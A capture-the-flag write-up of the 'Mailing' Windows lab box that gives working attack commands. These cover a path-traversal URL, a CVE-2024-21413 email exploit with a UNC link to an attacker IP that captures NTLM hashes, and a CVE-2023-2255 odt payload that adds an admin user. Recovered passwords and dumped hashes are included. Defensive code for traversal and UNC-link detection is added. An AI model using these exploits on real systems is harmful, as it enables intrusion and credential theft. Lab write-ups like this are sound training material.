Basic information

Port scan

Port 80 plus a number of mail-service ports are open:

$ nmap -sC -sV 10.10.11.14
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-06 13:30 CST
Nmap scan report for 10.10.11.14
Host is up (0.10s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL IMAP4rev1 CHILDREN OK CAPABILITY completed IDLE RIGHTS=texkA0001 IMAP4 QUOTA SORT NAMESPACE
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_smtp-commands: Couldn't establish connection on port 465
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -4m49s
| smb2-time:
| date: 2024-05-06T05:27:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.19 seconds

80

A hosts entry is needed:

10.10.11.14 mailing.htb

It is a mail-related site running hMailServer. The bottom of the page offers an introductory PDF for download; from the PDF we learn which mail clients are in use, as well as maya's email address:

maya@mailing.htb

LFI

The file download endpoint has a very basic LFI:

hMailServer.ini

We saw earlier that hMailServer is in use, so we read its configuration file at the location given in the documentation; the only difference is that the documentation says Program Files while the actual install directory is Program Files (x86):

http://mailing.htb/download.php?file=..\..\Program+Files+(x86)\hMailServer\bin\hMailServer.ini

AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

# cmd5 has a record of this hash
homenetworkingadministrator
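
The traversal above works because the download handler joins whatever is in the `file` parameter onto its base directory without checking where the result ends up. The following is an added example (not code from the box or from the writeup) of the check a download endpoint should perform: URL-decode the parameter, reject absolute, drive-qualified and UNC paths, normalise the joined path with Windows semantics (both `/` and `\` are separators, and NTFS is case-insensitive) and confirm it is still inside the download root. `DOWNLOAD_ROOT` is an assumed, constructed path; the sample requests include the exact payload from the writeup.

```python
import ntpath
from typing import Optional
from urllib.parse import unquote_plus

# Constructed example root; the real directory on the box is not known from the page.
DOWNLOAD_ROOT = r"C:\inetpub\wwwroot\downloads"


def resolve_download(file_param: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Return the absolute path to serve, or None if the request escapes the root.

    Pure string handling via ntpath, so this runs on any OS without touching disk.
    """
    # The web server decodes the query string; '+' becomes a space, %2e becomes '.'.
    name = unquote_plus(file_param)
    # NUL bytes truncate paths in many native APIs; never pass them on.
    if "\x00" in name:
        return None
    # Reject rooted paths (\foo, /foo), drive letters (C:...) and UNC paths (\\host\share).
    if name.startswith(("\\", "/")) or ntpath.isabs(name) or ntpath.splitdrive(name)[0]:
        return None
    root_norm = ntpath.normpath(root)
    # normpath collapses every '..' and '.' segment, including ones written with '/'.
    candidate = ntpath.normpath(ntpath.join(root_norm, name))
    # Containment check is done case-insensitively to match NTFS behaviour.
    try:
        common = ntpath.commonpath([root_norm.lower(), candidate.lower()])
    except ValueError:  # different drives or mixed absolute/relative paths
        return None
    if common != root_norm.lower():
        return None
    return candidate


def classify(file_param: str) -> str:
    """Convenience wrapper returning 'allow' or 'deny' for a raw parameter value."""
    return "allow" if resolve_download(file_param) else "deny"


if __name__ == "__main__":
    # Constructed requests: the first is the traversal payload from the writeup.
    for req in (
        r"..\..\Program+Files+(x86)\hMailServer\bin\hMailServer.ini",
        "../../Windows/win.ini",
        r"\\10.10.14.6\share\file.txt",
        r"C:\Windows\win.ini",
        "brochure.pdf",
        r"sub\..\brochure.pdf",
    ):
        print(f"{classify(req):5s} {req}")
```

The decisive step is comparing the normalised result against the root rather than scanning the input for `..`: a denylist misses encodings and mixed separators, whereas the containment check is indifferent to how the traversal was spelled.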

CVE-2024-21413

The credentials we obtained can send mail. Given the client information from the PDF, the idea is to send maya an email that uses the recent vulnerability to capture maya's NetNTLM hash, then crack the password:

sudo python3 Responder.py -i 10.10.14.6 -v

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username "Administrator@mailing.htb" --password "homenetworkingadministrator" --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.6\miao\miao' --subject "miao"

[SMB] NTLMv2-SSP Hash : maya<hash elided>

sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

m4y4ngs4ri
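
The capture works only because the client follows a link to a share on an attacker-controlled host and authenticates to it. On the defensive side, a mail gateway or log-review script can flag exactly this pattern: messages carrying UNC or `file://` references to hosts that are not the organisation's own file servers. The following is an added example, not part of the writeup and not related to the CVE tooling above; the trusted hosts, the trusted network and the three sample messages are all constructed, with the suspicious sample reusing the UNC path from the writeup.

```python
import ipaddress
import re
from typing import List, Tuple

# Constructed allow-list: hosts and networks where internal file shares legitimately live.
TRUSTED_HOSTS = {"mailing.htb", "fileserver.mailing.htb"}
TRUSTED_NETS = [ipaddress.ip_network("10.10.11.0/24")]

# \\host\share\... : a UNC path not preceded by a word character or ':' (avoids matching
# the middle of an already-matched file:// URL or an escaped string).
UNC_RE = re.compile(r"(?<![\w:])\\\\([^\\\s\"'<>]+)\\[^\s\"'<>]*")
# file://host/share/... with either separator after the host.
FILE_URL_RE = re.compile(r"file://+([^/\\\s\"'<>]+)[/\\][^\s\"'<>]*", re.IGNORECASE)


def is_trusted_host(host: str) -> bool:
    """True if host is an allow-listed name or an address inside a trusted network."""
    host = host.strip("[]").lower()
    if host in TRUSTED_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # unknown hostname: treat as untrusted
    return any(addr in net for net in TRUSTED_NETS)


def find_remote_share_links(body: str) -> List[Tuple[str, str, str]]:
    """Return (kind, host, link) for every UNC or file:// reference to an untrusted host."""
    findings = []
    seen = set()
    for kind, pattern in (("unc", UNC_RE), ("file", FILE_URL_RE)):
        for match in pattern.finditer(body):
            link, host = match.group(0), match.group(1)
            if link in seen or is_trusted_host(host):
                continue
            seen.add(link)
            findings.append((kind, host, link))
    return findings


# Constructed sample messages, as a gateway would see their plain-text bodies.
SAMPLE_MESSAGES = {
    "benign": r"Hi Maya, the quarterly report is on \\fileserver.mailing.htb\reports\q1.pdf",
    "suspicious": r"Hi Maya, please check \\10.10.14.6\miao\miao for the invoice.",
    "file_url": "Open file://203.0.113.5/share/doc.docx to review before Friday",
}


if __name__ == "__main__":
    for name, body in SAMPLE_MESSAGES.items():
        hits = find_remote_share_links(body)
        verdict = "FLAG" if hits else "ok  "
        print(f"{verdict} {name}: {hits}")
```

This is a heuristic, not a signature for any particular CVE: it does not try to recognise the bypass that makes the link open automatically, only the outbound share reference that every variant of this technique depends on, which is why it also catches the plain `file://` form. Pair it with egress filtering of SMB (445/tcp) to the internet, which removes the authentication leak even when a message gets through.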

user flag

Log in with the maya credentials we obtained:

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

Privilege escalation information

Routine enumeration turns up a scheduled task that runs periodically. We have no read permission on the script it references, but a ps1 file with the same name can be seen in the LibreOffice directory:

schtasks /query /v /fo LIST /tn "Test"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Users\localadmin\Documents\scripts\soffice.ps1

Reading that file shows that it opens the odt files in a specified directory, but the scheduled task does not use the Public directory; a little enumeration reveals Important Documents in the root of the C: drive.

So the plan is to craft a malicious odt file, upload it there, and wait for the task to trigger it.

Privilege escalation & root flag

The Important Documents directory is cleaned up automatically and antivirus is present, so we stick to simple commands, such as adding an administrator user.

Also, given the installed LibreOffice version, the following can be used to craft the odt file:

python3 CVE-2023-2255.py --cmd 'net user miao 123456 /add' --output '../exploit.odt'
# another non-English machine, so the group is named Administradores
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores miao /add' --output '../exploit.odt'

upload exploit.odt

Then we can use the administrator account we added to dump the hashes and read the root flag:

hashdump

./bin/python3 ./examples/secretsdump.py miao:123456@10.10.11.14

Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::

References